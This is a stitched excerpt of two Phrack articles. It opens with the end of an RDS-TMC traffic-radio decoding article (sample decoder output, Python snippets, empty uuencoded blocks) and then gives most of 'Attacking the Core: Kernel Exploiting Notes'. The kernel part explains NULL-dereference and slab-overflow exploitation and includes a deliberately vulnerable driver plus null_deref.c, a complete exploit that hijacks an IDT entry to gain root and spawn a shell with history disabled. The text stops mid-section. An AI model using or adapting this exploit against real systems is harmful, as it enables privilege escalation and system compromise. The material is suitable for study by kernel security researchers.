PI code          Checkword  Group B0 TP PTY   <5 bits> Checkword  Data             Checkword  Data             Checkword
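Once the offset of a Group is known, slicing it into (data, checkword)
pairs is trivial. A sketch, using the Group above as input:

```python
def split_group(bits104):
    """Cut a 104-bit Group into four (16-bit data, 10-bit checkword)
    string pairs, one per Block."""
    blocks = [bits104[i:i + 26] for i in range(0, 104, 26)]
    return [(b[:16], b[16:]) for b in blocks]

group = ('0101010000000001' '1111011001'    # Block 1: PI + checkword
         '0000010000101000' '1100101100'    # Block 2
         '0000001000010100' '0000110010'    # Block 3
         '0101001001000001' '0001101110')   # Block 4
# split_group(group)[0] -> ('0101010000000001', '1111011001')
```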

So we can isolate and identify RDS messages, now you can either parse them
visually by reading the specs (not a very scalable way we might say) or use
a tool like our Simple RDS Decoder.

--[ 6. Simple RDS Decoder 0.1

The tool parses basic RDS messages and the 0A Group (more Group decoding
will be implemented in future versions) and performs full decoding of
Single Group RDS-TMC messages (Multi Group support is also planned for
future releases).
Here's the basic usage:

# ./srdsd -h

Simple RDS-TMC Decoder 0.1     ||
Copyright 2007 Andrea Barisani || <>
Usage: ./ [-h|-H|-P|-t] [-d <location db path>] [-p <PI number>] <input file>
   -t display only tmc packets
   -H HTML output (outputs to /tmp/rds-*.html)
   -p PI number
   -P PI search
   -d location db path
   -h this help

Note: -d option expects a DAT Location Table code according to TMCF-LT-EF-MFF-v06 
      standard (2005/05/11)

As we mentioned, the first step is finding the PI for your RDS stream; if
you don't know it already you can use the '-P' option:

# ./srdsd -P rds_dump.raw | tail

0010000110000000: 4140 (2180)
1000011000000001: 4146 (8601)
0001100000000101: 4158 (1805)
1001000011000000: 4160 (90c0)
0000110000000010: 4163 (0c02)
0110000000010100: 4163 (6014)
0011000000001010: 4164 (300a)
0100100001100000: 4167 (4860)
1010010000110000: 4172 (a430)
0101001000011000: 4185 (5218)

Here 5218 looks like a reasonable candidate, being the most recurrent
string. Let's try it:

# ./srdsd -p 5218 -d ~/loc_db/ rds_dump.raw

Reading TMC Location Table at ~/loc_db/:
	 parsing NAMES: 13135 entries
	 parsing ROADS: 1011 entries
	 parsing SEGMENTS: 15 entries
	 parsing POINTS: 12501 entries

Got RDS message (frame 1)
	Programme Identification: 0101001000011000 (5218)
	Group type code/version: 0000/0 (0A  - Tuning)
	Traffic Program: 1
	Programme Type: 01001 (9  - Varied Speech)
	Block 2: 01110
	Block 3: 1111100000010110
	Block 4: 0011000000110010
	Decoded 0A group:
		Traffic Announcement: 0
		Music Speech switch: 0
		Decoder Identification control: 110 (Artificial Head / PS char 5,6)
		Alternative Frequencies: 11111000, 00010110 (112.3, 89.7)
		Programme Service name: 0011000000110010 (02)
		Collected PSN: 02


Got RDS message (frame 76)
	Programme Identification: 0101001000011000 (5218)
	Group type code/version: 1000/0 (8A  - TMC)
	Traffic Program: 1
	Programme Type: 01001 (9  - Varied Speech)
	Block 2: 01000
	Block 3: 0101100001110011
	Block 4: 0000110000001100
	Decoded 8A group:
		Bit X4: 0 (User message)
		Bit X3: 1 (Single-group message)
		Duration and Persistence: 000 (no explicit duration given)
		Diversion advice: 0
		Direction: 1 (-)
		Extent: 011 (3)
		Event: 00001110011 (115 - slow traffic (with average speeds Q))
		Location: 0000110000001100 (3084)
		Decoded Location:
			Location code type: POINT
			Name ID: 11013 (Sv. Grande Raccordo Anulare)
			Road code: 266 (Roma-Ss16)
			GPS: 41.98449 N 12.49321 E

...and so on.

The 'Collected PSN' variable holds all the characters of the Programme
Service name seen so far; this way we can track (just like RDS FM radios
do) the name of the station:

# ./srdsd -p 5201 rds_dump.raw | grep "Collected PSN" | head

		Collected PSN: DI
		Collected PSN: DIO1
		Collected PSN: DIO1  
		Collected PSN: RADIO1  
		Collected PSN: RADIO1  
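The incremental collection works because each 0A group carries only two
characters of the 8-character PS name, at a position given by the two
lowest bits of Block 2's remaining 5 bits. A sketch of the reassembly
(helper names are ours):

```python
psn = [' '] * 8                         # the 8-char Programme Service name

def feed_0a(block2_rest, block4_data):
    """block2_rest: the 5 leftover bits of Block 2, as a '0'/'1' string;
    block4_data: the 16 data bits of Block 4 (two ASCII characters)."""
    pos = int(block2_rest[3:5], 2)      # segment address, 0..3
    chars = int(block4_data, 2).to_bytes(2, 'big').decode('ascii')
    psn[pos * 2:pos * 2 + 2] = chars    # two characters per group

# after four groups covering segments 0..3 the full name is assembled
```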

Check out the '-H' switch for HTML'ized output in /tmp (which can be
useful for directly following the Google Maps links). We also have a
version that plots all the traffic on Google Maps using their API; if you
are interested in it just email us.

Have fun.

--[ I. References

[1] - Italian RDS-TMC Location Table Database

[2] - Philips FM1216 DataSheet

[3] - PVR Hardware Database

[4] - SGS-Thompson Microelectronics TDA7330

[5] - Philips SAA6579

[6] - uJDM PIC Programmer

[7] - Maxim RS-232

[8] - Xcircuit 

--[ II. Code

Code also available at

<++> Simple RDS Decoder 0.1 - srdsd.uue

begin 644 srdsd

<--> Simple RDS Decoder 0.1 - srdsd.uue

Here's the schematic of the RDS Demodulator. You can directly use it to
view / print the circuit or import the file with Xcircuit[8] to
modify the diagram.


begin 644


|=[ EOF ]=---------------------------------------------------------------=|


            _                                                  _
          _/B\_                                              _/W\_
          (* *)              Phrack #64 file 6               (* *)
          | - |                                              | - |
          |   | Attacking the Core : Kernel Exploiting Notes |   |
          |   |                                              |   |
          |   |       By sqrkkyu <>     |   |
          |   |          twzi <>                |   |
          |   |                                              |   |

                             ==Phrack Inc.==

               Volume 0x00, Issue 0x00, Phile #0x00 of 0x00

|=------------=[ Attacking the Core : Kernel Exploiting Notes ]=---------=|
|=-------------=[ and ]=-------------=|
|=------------------------=[ February 12 2007 ]=-------------------------=|

------[  Index 

  1 - The playground 

    1.1 - Kernel/Userland virtual address space layouts
    1.2 - Dummy device driver and real vulnerabilities
    1.3 - Notes about information gathering

  2 - Kernel vulnerabilities and bugs 

    2.1 - NULL/userspace dereference vulnerabilities
        2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c 
    2.2 - The Slab Allocator
        2.2.1 - Slab overflow vulnerabilities
        2.2.2 - Slab overflow exploiting : MCAST_MSFILTER
        2.2.3 - Slab overflow vulnerabilities : Solaris notes 
    2.3 - Stack overflow vulnerabilities 
        2.3.1 - UltraSPARC exploiting
        2.3.2 - A reliable Solaris/UltraSPARC exploit
    2.4 - A primer on logical bugs : race conditions 
        2.4.1 - Forcing a kernel path to sleep
        2.4.2 - AMD64 and race condition exploiting: sendmsg

  3 - Advanced scenarios 
    3.1 - PaX KERNEXEC & separated kernel/user space 
    3.2 - Remote Kernel Exploiting 
        3.2.1 - The Network Contest
        3.2.2 - Stack Frame Flow Recovery
        3.2.3 - Resources Restoring 
        3.2.4 - Copying the Stub
        3.2.5 - Executing Code in Userspace Context [Gimme Life!]
        3.2.6 - The Code : sendtwsk.c

  4 - Final words  

  5 - References

  6 - Sources : drivers and exploits [stuff.tgz]      

------[ Intro 

The last few years have seen an increasing interest towards kernel based
exploitation. The growing diffusion of "security prevention" approaches
(no-exec stack, no-exec heap, ascii-armored library mmapping, mmap/stack
and generally virtual layout randomization, just to point out the most
known) has been making userland exploitation harder and harder.
Moreover there has been an extensive work of auditing on application
code, so that new bugs are generally more complex to handle and exploit.

The attention has thus turned towards the core of the operating system,
towards kernel (in)security. This paper will attempt to give an insight
into kernel exploitation, with examples for IA-32, UltraSPARC and AMD64.
Linux and Solaris will be the target operating systems. More precisely,
one architecture in turn will be the main one covered for each of the
three main exploiting demonstration categories: slab (IA-32), stack
(UltraSPARC) and race condition (AMD64). The details explained in those
'deep focus' sections apply, though, almost in toto to all the other
exploiting scenarios.

Since exploitation examples are surely interesting but usually do not
show the "effective" complexity of taking advantage of vulnerabilities, a
couple of working real-life exploits will be presented too.

------[ 1 - The playground 

Let's just point this out before starting: "bruteforcing" and "kernel"
aren't two words that go well together. One can't just crash the kernel
over and over trying to guess the right return address or the good
alignment. An error in kernel exploitation usually leads to a crash,
panic or unstable state of the operating system.
The "information gathering" step is thus definitely important, just like
a good knowledge of the operating system layout.

---[ 1.1 - Kernel/Userland virtual address space layouts 

From the userland point of view, we don't see almost anything of the
kernel layout nor of the addresses at which it is mapped [there are
indeed a couple of pieces of information that we can gather from
userland, and we're going to point them out later].
Nevertheless it is from userland that we have to start to carry out our
attack, and so a good knowledge of the kernel virtual memory layout
(and implementation) is, indeed, a must.

There are two possible address space layouts :

- kernel space on behalf of user space (kernel page tables are
replicated over every process; the virtual address space is split in
two parts, one for the kernel and one for the processes).
Kernels running on x86, AMD64 and sun4m/sun4d architectures usually have
this kind of implementation. 

- separated kernel and process address space (both can use the whole
address space). Such an implementation, to be efficient, requires a
dedicated support from the underlying architecture. It is the case of
the primary and secondary context registers used in conjunction with the
ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture.

To see the main advantage (from an exploiting perspective) of the first
approach over the second one we need to introduce the concept of
"process context".   
Any time the CPU is in "supervisor" mode (the well-known ring0 on ia-32),
the kernel path it is executing is said to be in interrupt context if it
doesn't have a backing process.
Code in interrupt context can't block (for example waiting for demand
paging to bring in a referenced userspace page): the scheduler is
unable to know what to put to sleep (and what to wake up after). 

Code running in process context has instead an associated process
(usually the one that "generated" the kernel code path, for example
issuing a systemcall) and is free to block/sleep (and so, it's free to
reference the userland virtual address space). 
This is good news on systems which implement a combined user/kernel
address space, since, while executing at kernel level, we can
dereference (or jump to) userland addresses.
The advantages are obvious (and many) :

  - we don't have to "guess" where our shellcode will be and we can
    write it in C (which makes it easier to write, if needed, long and
    somewhat complex recovery code)

  - we don't have to face the problem of finding a suitable large and
    safe place to store it. 

  - we don't have to worry about no-exec page protection (we're free to
    mmap/mremap as we wish, and, obviously, load directly the code in
    .text segment, if we don't need to patch it at runtime). 

  - we can mmap large portions of the address space and fill them with 
    nops or nop-alike code/data (useful when we don't completely
    control the return address or the dereference)

  - we can easily take advantage of the so-called "NULL pointer
    dereference bugs" ("technically" described later on)

The space left to the kernel is, however, limited in size : on the x86
architecture it is 1 gigabyte on Linux, while on Solaris it fluctuates
depending on the amount of physical memory (check
usr/src/uts/i86pc/os/startup.c inside the OpenSolaris sources).
This fluctuation turned out to be necessary to avoid, as much as
possible, wasting virtual memory ranges and, at the same time, to avoid
pressure over the space reserved to the kernel.

The only limitation to kernel (and process) virtual space on systems
implementing a separated userland/kernelland address space is the one
imposed by the architecture (UltraSPARC I and II can reference only 44
bits of the whole 64-bit addressable space; this VA-hole lies between
0x0000080000000000 and 0xFFFFF7FFFFFFFFFF).
This memory model makes exploitation indeed harder, because we can't
directly dereference the userspace. The previously cited NULL pointer
dereferences are pretty much un-exploitable.
Moreover, we can't rely on "valid" userland addresses as a place to store
our shellcode (or any other kernel emulation data), nor can we "return
to userspace".

We won't go into more detail here with a theoretical description of the
architectures (you can check the reference manuals at [1], [2] and [3]),
since we've preferred to couple the analysis of the architectural and
operating system internals relevant to exploitation with the
presentation of the actual exploit code.

---[ 1.2 - Dummy device driver and real vulnerabilities 

As we said in the introduction, we're going to present a couple of real
working exploits, hoping to give a better insight into the whole kernel
exploitation process.
We've written exploits for :

-  MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab
   overflow exploiting

-  sendmsg vulnerability [5], used to demonstrate an effective race
   condition (and a stack overflow on AMD64) 

-  madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a real
   remote exploit for the Linux kernel. That exploit was already released
   at [22] before the release of this paper (which contains a more
   detailed discussion of it, plus another 'dummy based' exploit for a
   more complex scenario).
Moreover, we've written a dummy device driver (for Linux and Solaris) to
demonstrate with examples the techniques presented. 
A more complex remote exploit (as previously mentioned) and an exploit 
capable to circumvent Linux with PaX/KERNEXEC (and userspace/kernelspace
separation) will be presented too.

---[ 1.3 - Notes about information gathering 

Remember when we were talking about information gathering ? Nearly every
operating system 'exports' to userland information useful for development
and debugging. Both Linux and Solaris (we're not taking into account, for
now, 'security patches') expose, readable by the user, the list and
addresses of their exported symbols (the symbols that module writers can
reference) : /proc/ksyms on Linux 2.4, /proc/kallsyms on Linux 2.6 and
/dev/ksyms on Solaris (the first two are text files, the last one is an
ELF file with a SYMTAB section).
Those files provide useful information about what is compiled into the
kernel and at what addresses certain functions and structs are located,
addresses that we can gather at runtime and use to increase the
reliability of our exploit.

But this information could be missing in some environments : the /proc
filesystem could be un-mounted, or the kernel compiled (along with some
security switch/patch) to not export it.
This is more a Linux problem than a Solaris one, nowadays. Solaris exports
way more information than Linux (probably to aid debugging without
having the sources) to the userland. Every module is shown with its
loading address by 'modinfo', the proc interface exports the address of
the kernel 'proc_t' struct to the userland (giving a crucial entry point,
as we will see, for exploitation on UltraSPARC systems) and the 'kstat'
utility lets us investigate many kernel parameters.

In absence of /proc (and /sys, on Linux 2.6) there's another place we can
gather information from, the kernel image on the filesystem. 
There are actually two possible favourable situations :

  - the image is somewhere on the filesystem and it's readable, which is
    the default for many Linux distributions and for Solaris

  - the target host is running a default kernel image, either from the
    installation or taken from a repository. In that situation it is just
    a matter of recreating the same image on our system and inferring
    from it.
    This should always be possible on Solaris, given the patchlevel
    (taken from 'uname' and/or 'showrev -p').
    Things could change if OpenSolaris takes off, we'll see.

The presence of the image (or the possibility of knowing it) is crucial
for the KERNEXEC/separated userspace-kernelspace environment exploitation
presented at the end of the paper.

Given that we don't have exported information and that the careful
administrator has removed the running kernel image (and, logically, in
the absence of kernel memory leaks ;)) we have one last resource that
can help in exploitation : the architecture itself.

Let's take the x86 arch : a process running at ring3 may query the
logical address and offset/attribute of the processor tables GDT, LDT,
IDT and TSS :

- through 'sgdt' we get the base address and max offset of the GDT 
- through 'sldt' we can get the GDT entry index of current LDT 
- through 'sidt' we can get the base address and max offset of IDT 
- through 'str'  we can get the GDT entry index of the current TSS 

The best choice (not the only one possible) in that case is the IDT. The
possibility of changing just a single byte in a controlled place of it
leads to a fully working, reliable exploit [*].

[*] The idea here is to modify the MSB of the base_address of an IDT entry
    and so "hijack" the exception handler. Logically we need a controlled
    byte overwrite, or a partially controlled one with a byte value below
    the 'kernelbase' value, so that we can make it point into the userland
    portion. We won't go into deeper detail about the IDT
    layout/implementation here; you can find it inside the processor
    manuals [1] and kad's phrack59 article "Handling the Interrupt
    Descriptor Table" [6].
    The NULL pointer dereference exploit presented for Linux implements
    this technique.  

As important as the information gathering step is the recovery step,
which aims to leave the kernel in a consistent state. This step is
usually performed inside the shellcode itself or just after the exploit
has (successfully) taken place, by using /dev/kmem or a loadable module
(if available).
This step is logically exploit-dependent, so we will just explain it
along with the examples (making a categorization would be pointless).

------[ 2 - Kernel vulnerabilities and bugs 

We start now with an excursus over the various types of kernel
vulnerabilities. The kernel is a big and complex beast, so even if we're
going to track down some "common" scenarios, there are a lot more
possible "logical bugs" that can lead to a system compromise.

We will cover stack based, "heap" (better, slab) based and NULL/userspace
dereference vulnerabilities. As an example of a "logical bug" a whole
chapter is dedicated to race conditions and techniques to force a kernel
path to sleep/reschedule (along with a real exploit for the sendmsg [5]
vulnerability on AMD64).

We won't cover in this paper the range of vulnerabilities related to
virtual memory logical errors, since those have already been extensively
described, and cleverly exploited, on Linux, by the iSEC [7] people.
Moreover, it's nearly useless, in our opinion, to create a "crafted"
demonstrative vulnerable code for logical bugs, and we weren't aware of
any _public_ vulnerability of this kind on Solaris. If you are, feel
free to submit it, we'll be happy to work on it ;).

---[ 2.1 - NULL/userspace dereference vulnerabilities 

This kind of vulnerability derives from the use of an uninitialized
(generally NULL-valued) or trashed pointer, which ends up pointing inside
the userspace part of the virtual memory address space.
The normal behaviour of an operating system in such a situation is an
oops or a crash (depending on the severity of the dereference) while
attempting to access un-mapped memory.

But we can, obviously, mmap that memory range and let the kernel find
"valid" malicious data. That's more than enough to gain root privileges.
We can delineate two possible scenarios :

  - instruction pointer modification (direct call/jmp dereference,
    called function pointers inside a struct, etc)

  - "controlled" write on kernelspace 

The first kind of vulnerability is really trivial to exploit : it's just
a matter of mmapping the referenced page and putting our shellcode there.
If the dereferenced address is a struct with a function pointer inside
(or a chain of structs leading to a function pointer), it is just a
matter of emulating those structs in userspace, making the function
pointer point to our shellcode and letting/forcing the kernel path to
call it.

We won't show an example of this kind of vulnerability, since this is the
"last stage" of any more complex exploit (as we will see, we'll always be
trying, when possible, to jump to userspace).

The second kind of vulnerability is a little more complex, since we can't
directly modify the instruction pointer, but we've the possibility to
write anywhere in kernel memory (with controlled or uncontrolled data). 

Let's take a look at this snippet of code, taken from our Linux dummy
device driver :

< stuff/drivers/linux/dummy.h >


struct user_data_ioctl
{
  int size;
  char *buffer;
};

< / >

< stuff/drivers/linux/dummy.c >

static int alloc_info(unsigned long sub_cmd)
{
  struct user_data_ioctl user_info;
  struct info_user *info;
  struct user_perm *perm;

  if(copy_from_user(&user_info,
                    (void __user*)sub_cmd,
                    sizeof(struct user_data_ioctl)))
    return -EFAULT;

  if(user_info.size > MAX_STORE_SIZE)  [1]
    return -ENOENT;

  info = kmalloc(sizeof(struct info_user), GFP_KERNEL);
  if(!info)
    return -ENOMEM;

  perm = kmalloc(sizeof(struct user_perm), GFP_KERNEL);
  if(!perm)
    return -ENOMEM;

  info->timestamp = 0;//sched_clock();
  info->max_size  = user_info.size;
  info->data = kmalloc(user_info.size, GFP_KERNEL); [2]
  /* unchecked alloc */

  perm->uid = current->uid;
  info->data->perm = perm; [3]

  glob_info = info;
  return 0;
}


static int store_info(unsigned long sub_cmd)
{
  ...

  glob_info->data->perm->uid = current->uid; [4]

  ...
}
< / > 

Due to the integer signedness issue at [1], we can pass a huge value
to the kmalloc at [2], making it fail (and thus return NULL).
The lack of a check at that point leaves a NULL value in the info->data
pointer, which is later used at [3], and also inside store_info at [4],
to save the current uid value.

What we have to do to exploit such code is simply mmap the zero page
(0x00000000 - NULL) in userspace, make the kmalloc fail by passing a
negative value, and then prepare a 'fake' data struct in the previously
mmapped area, providing a working pointer for 'perm' and thus being able
to write our 'uid' anywhere in memory.

At that point we have many ways to exploit the vulnerable code (exploiting
while being able to write anywhere some arbitrary or, in that case,
partially controlled data is indeed limited only by imagination), but it's
better to find a "working everywhere" way.

As we said above, we're going to use the IDT and overwrite one of its
entries (more precisely a Trap Gate, so that we're able to hijack an
exception handler and redirect the code-flow towards userspace).
Each IDT entry is 64 bits (8 bytes) long and we want to overwrite the
'base_offset' value of it, to be able to modify the MSB of the exception
handler routine address and thus redirect it below the PAGE_OFFSET
(0xc0000000) value.
Since the higher 16 bits are in the 7th and 8th bytes of the IDT entry,
those are our target, but at [4] we are writing 4 bytes for the 'uid'
value, so we're going to trash the next entry. It is better to use two
adjacent 'seldom used' entries (in case, for some strange reason,
something goes bad) and we have decided to use the 4th and 5th entries :
#OF (Overflow Exception) and #BR (BOUND Range Exceeded Exception).

At that point we don't completely control the return address, but that's
not a big problem, since we can mmap a large region of the userspace and
fill it with NOPs, to prepare a comfortable and safe landing point for
our exploit. The last thing we have to do is to restore, once we get the
control flow back in userspace, the original IDT entries, hardcoding the
values inside the shellcode stub or using an LKM or /dev/kmem patching
code.

At that point our exploit is ready to be launched for our first root
shell.
As a last (indeed obvious) note, NULL dereference vulnerabilities are
only exploitable on operating systems implementing a 'combined userspace
and kernelspace' memory model.

---[ 2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c  

< stuff/expl/null_deref.c >

#include <sys/ioctl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdint.h>

#include "dummy.h"

#define DEVICE          "/dev/dummy"
#define NOP             0x90
#define STACK_SIZE      8192

//#define STACK_SIZE 4096

#define PAGE_SIZE       0x1000
#define PAGE_OFFSET     12
#define PAGE_MASK       ~(PAGE_SIZE -1)

#define ANTANI          "antani"

uint32_t        bound_check[2]={0x00,0x00};
extern void     do_it();
uid_t           UID;

void do_bound_check()
{
        asm volatile("bound %1, %0\t\n" : "=m"(bound_check) : "a"(0xFF));
}

/* simple shell spawn */
void get_root()
{
  char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
  char *envp[] = { "TERM=linux", "PS1=y0y0\\$", "BASH_HISTORY=/dev/null",
                   "HISTORY=/dev/null", "history=/dev/null",
                   "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };

  execve("/bin/sh", argv, envp);
  fprintf(stderr, "[**] Execve failed\n");
}

/* this function is called by the fake exception handler: grab uid 0 and
   restore the trashed entry */
void give_priv_and_restore(unsigned int thread)
{
  int i;
  unsigned short addr;
  unsigned int* p = (unsigned int*)thread;

  /* simple trick */
  for(i=0; i < 0x100; i++)
    if( (p[i] == UID) && (p[i+1] == UID) && (p[i+2] == UID) && (p[i+3] == UID) )
      p[i] = 0, p[i+1] = 0;
}

#define CODE_SIZE       0x1e

void dummy(void)
{
  asm volatile(
    "do_it:;"
    "addl $6, (%%esp);"  // after bound exception EIP points again to the bound instruction
    "movl %%esp, %%eax;"
    "andl %0, %%eax;"
    "movl (%%eax), %%eax;"
    "add $100, %%eax;"
    "pushl %%eax;"
    "movl $give_priv_and_restore, %%ebx;"
    "call *%%ebx;"
    "popl %%eax;"
    "iret;"
   :: "i"( ~(STACK_SIZE -1)));
}

struct idt_struct
{
  uint16_t limit;
  uint32_t base;
} __attribute__((packed));

static char *allocate_frame_chunk(unsigned int base_addr,
                                  unsigned int size,
                                  void* code_addr)
{
  unsigned int round_addr = base_addr & PAGE_MASK;
  unsigned int diff       = base_addr - round_addr;
  unsigned int len        = (size + diff + (PAGE_SIZE-1)) & PAGE_MASK;

  char *map_addr = mmap((void*)round_addr,
                        len,
                        PROT_READ|PROT_WRITE|PROT_EXEC,
                        MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                        -1,
                        0);
  if(map_addr == MAP_FAILED)
    return MAP_FAILED;

  if(code_addr)
  {
    memset(map_addr, NOP, len);
    memcpy(map_addr, code_addr, size);
  }
  else
    memset(map_addr, 0x00, len);

  return (char*)base_addr;
}

inline unsigned int *get_zero_page(unsigned int size)
{
  return (unsigned int*)allocate_frame_chunk(0x00000000, size, NULL);
}

#define BOUND_ENTRY 5
unsigned int get_BOUND_address()
{
        struct idt_struct idt;
        asm volatile("sidt %0\t\n" : "=m"(idt));
        return idt.base + (8*BOUND_ENTRY);
}

unsigned int prepare_jump_code()
{
  UID = getuid();       /* set global uid */

  unsigned int base_address = ((UID & 0x0000FF00) << 16) + ((UID & 0xFF) << 16);
  printf("Using base address of: 0x%08x-0x%08x\n", base_address,
         base_address + 0x20000 -1);

  char *addr = allocate_frame_chunk(base_address, 0x20000, NULL);
  if(addr == MAP_FAILED)
  {
    perror("unable to mmap jump code");
    exit(1);
  }

  memset((void*)base_address, NOP, 0x20000);
  memcpy((void*)(base_address + 0x10000), do_it, CODE_SIZE);

  return base_address;
}

int main(int argc, char *argv[])
{
  struct user_data_ioctl user_ioctl;
  unsigned int *zero_page, *jump_pages, save_ptr;

  zero_page = get_zero_page(PAGE_SIZE);
  if(zero_page == MAP_FAILED)
  {
    perror("mmap: unable to map zero page");
    exit(1);
  }

  jump_pages = (unsigned int*)prepare_jump_code();

  int ret, fd = open(DEVICE,  O_RDONLY), alloc_size;

  if(argc > 1)
    alloc_size = atoi(argv[1]);
  else
    alloc_size = PAGE_SIZE-8;

  if(fd < 0)
  {
    perror("open: dummy device");
    exit(1);
  }

  memset(&user_ioctl, 0x00, sizeof(struct user_data_ioctl));
  user_ioctl.size = alloc_size;

  ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, &user_ioctl);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_ALLOC_INFO");
    exit(1);
  }

  /* save old struct ptr stored by kernel in the first word */
  save_ptr = *zero_page;

  /* compute the new ptr inside the IDT table between BOUND and INVALIDOP exception */
  printf("IDT bound: %x\n", get_BOUND_address());
  *zero_page = get_BOUND_address() + 6;

  ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl);

  /* trigger the hijacked #BR exception handler */
  do_bound_check();

  /* restore trashed ptr */
  *zero_page = save_ptr;

  ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_FREE_INFO");
    exit(1);
  }

  get_root();

  return 0;
}
< / > 

---[ 2.2 - The Slab Allocator 

The main purpose of a slab allocator is to speed up the
allocation/deallocation of heavily used small 'objects' and to reduce
the fragmentation that would derive from using the page-based allocator.
Both Solaris and Linux implement a slab memory allocator which derives
from the one described by Bonwick [8] in 1994 and first implemented in
SunOS 5.4.

The idea behind it is, basically, that objects of the same type are
grouped together inside a cache, in their constructed form. The cache is
divided into 'slabs', consisting of one or more contiguous page frames.
Every time the operating system needs more objects, new page frames (and
thus new 'slabs') are allocated and the objects inside are constructed.
Whenever a caller needs one of these objects, it gets returned an
already prepared one, which it only has to fill with valid data. When an
object is 'freed', it doesn't get destructed, but is simply returned to
its slab and marked as available.

Caches are created for the most used objects/structs inside the
operating system, for example those representing inodes, virtual memory
areas, etc.
General-purpose caches, suitable for small memory allocations, are
created too, one for each power of two, so that internal fragmentation
is guaranteed to be below 50%.
The Linux kmalloc() and the Solaris kmem_alloc() functions use exactly
those latter caches. Since it is up to the caller to 'clean' the
object returned from a slab (which could contain 'dead' data), wrapper
functions that return zeroed memory are usually provided too (kzalloc()
on Linux, kmem_zalloc() on Solaris).
An important (from an exploiting perspective) 'feature' of the slab
allocator is the 'bufctl', which is meaningful only inside a free
object, and is used to indicate the 'next free object'.
A list of free objects that behaves just like a LIFO is thus created,
and we'll see shortly that it is crucial for reliable exploitation.

To each slab is associated a controlling struct (kmem_slab_t on Solaris,
slab_t on Linux) which is stored inside the slab (at the start on Linux,
at the end on Solaris) if the object size is below a given limit (1/8 of
the page), or outside it otherwise.
Since the objects' size doesn't generally divide the slab size exactly,
some 'free' space is left over (space not belonging to any object, nor
to the slab controlling struct); it is used to 'color' the slab,
respecting the object alignment (if 'free' < 'alignment' no coloring
takes place).

The first object is thus saved at a 'different offset' inside the slab,
given by 'color value' * 'alignment' (and, consequently, the same
happens to all the subsequent objects), so that objects of the same size
in different slabs will be less likely to end up in the same hardware
cache lines.

We won't go into more detail about the slab allocator here, since it is
well and extensively explained in many other places, most notably at
[9], [10] and [11], and we move towards effective exploitation.
Some more implementation details will be given, though, along with the
explanation of the exploiting techniques.

---[ 2.2.1 - Slab overflow vulnerabilities  

NOTE: as we said before, Solaris and Linux have two different functions
to allocate from the general purpose caches, kmem_alloc() and kmalloc().
Those two functions behave basically in the same manner, so from now on
we'll just use 'kmalloc' and 'kmalloc'ed memory' in the discussion,
referring though to both operating systems' implementations.

A slab overflow is simply the writing past the buffer boundaries of a
kmalloc'ed object. The result of this overflow can be :

- overwriting an adjacent in-slab object.
- overwriting a page next to the slab one, in the case we're overwriting
  past the last object.
- overwriting the control structure associated with the slab (Solaris
  only).

The first case is the one we're going to show an exploit for. The main
idea in such a situation is to fill the slabs (we can track the slab
status thanks to /proc/slabinfo on Linux and kstat -n 'cache_name' on
Solaris) so that a new one is necessary.
We do that to be sure that we'll have a 'controlled' bufctl : since the
whole slabs were full, we got a new page, along with a 'fresh' bufctl 
pointer starting from the first object.

At that point we alloc two objects, free the first one and trigger the
vulnerable code : it will request a new object and overwrite right into
the previously allocated second one. If a pointer inside this second
object is stored and then used (after the overflow), it is under our
control.
This approach is very reliable.

The second case is more complex, since we don't have an object with a
pointer or any modifiable data value of interest to overwrite. We still
have one chance, though, using the page frame allocator.
We start eating up a lot of memory, requesting the kind of 'page' we
want to overflow into (for example, tons of file descriptors), putting
the memory under pressure. At that point we start freeing a couple of
them, so that the total amount freed counts for a page.
At that point we start filling the slab so that a new page is requested.
If we've been lucky, the new page is going to be placed just before one
of the previously allocated ones and we now have the chance to overwrite
it.

The main point affecting the reliability of such an exploit is :

  - it's not trivial to 'isolate' a given struct/data to mass alloc in
    the first step without also having other kernel structs/data growing
    together with it.
    An example will clarify : to allocate tons of file descriptors we
    need to create a large amount of threads. That translates into the
    allocation of all the related control structs, which could end up
    placed right after our overflowing buffer.

The third case is possible only on Solaris, and only for slabs which
keep objects smaller than 'page_size >> 3'. Since Solaris keeps the
kmem_slab struct at the end of the slab, we can use the overflow of the
last object to overwrite data inside it.

For the latter two types of exploit presented we have to take into
account slab coloring. Both operating systems store the 'next color
offset' inside the cache descriptor and update it at every slab
allocation (let's see an example from the OpenSolaris sources) :

< usr/src/uts/common/os/kmem.c >

static kmem_slab_t *
kmem_slab_create(kmem_cache_t *cp, int kmflag)
{
        size_t color, chunks;

        ...

        color = cp->cache_color + cp->cache_align;
        if (color > cp->cache_maxcolor)
                color = cp->cache_mincolor;
        cp->cache_color = color;

        ...
}

< / >

'mincolor' and 'maxcolor' are calculated at cache creation and represent
the boundaries of available caching :

# uname -a
SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
# kstat -n file_cache | grep slab
        slab_alloc                      280
        slab_create                     2
        slab_destroy                    0
        slab_free                       0
        slab_size                       8192
# kstat -n file_cache | grep align
        align                           8
# kstat -n file_cache | grep buf_size
        buf_size                        56
# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
> ::sizeof kmem_slab_t
sizeof (kmem_slab_t) = 0x38
> ::kmem_cache ! grep file_cache
00000300005fed88 file_cache                0000 000000       56      290
> 00000300005fed88::print kmem_cache_t cache_mincolor
cache_mincolor = 0
> 00000300005fed88::print kmem_cache_t cache_maxcolor
cache_maxcolor = 0x10
> 00000300005fed88::print kmem_cache_t cache_color
cache_color = 0x10
> ::quit

As you can see from kstat, 2 slabs have been created and we know the
alignment, which is 8. Object size is 56 bytes and the size of the
in-slab control struct is 56 (0x38), too. Each slab is 8192 bytes,
